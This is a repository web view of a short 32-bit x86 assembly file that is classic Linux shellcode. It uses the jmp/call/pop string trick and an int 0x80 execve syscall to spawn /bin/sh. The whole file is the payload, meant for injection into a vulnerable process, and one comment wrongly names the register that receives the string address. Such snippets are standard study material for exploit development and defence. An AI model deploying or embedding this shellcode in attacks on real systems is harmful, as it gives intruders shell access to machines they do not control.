aboutsummaryrefslogtreecommitdiff
path: root/shellcode/execve.asm
blob: 92f6de6e9faa5ef1dedfdb1b6215c091ab926461 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
BITS 32


; zero out registers
xor		eax,eax
xor		ebx,ebx
xor		ecx,ecx
cdq				; convert dword in eax to qword in edx
; do the 'string trick'
jmp short string

code:
pop		ebx		; pop the addr of the string intro esi (stack pointer register)
mov byte	[ebx + 7], al	; null-terminate the string
mov		al,0xb		; syscall number 0xb (11) is execve
int		0x80		; let the kernel do the stuff

string:
call code
db '/bin/sh'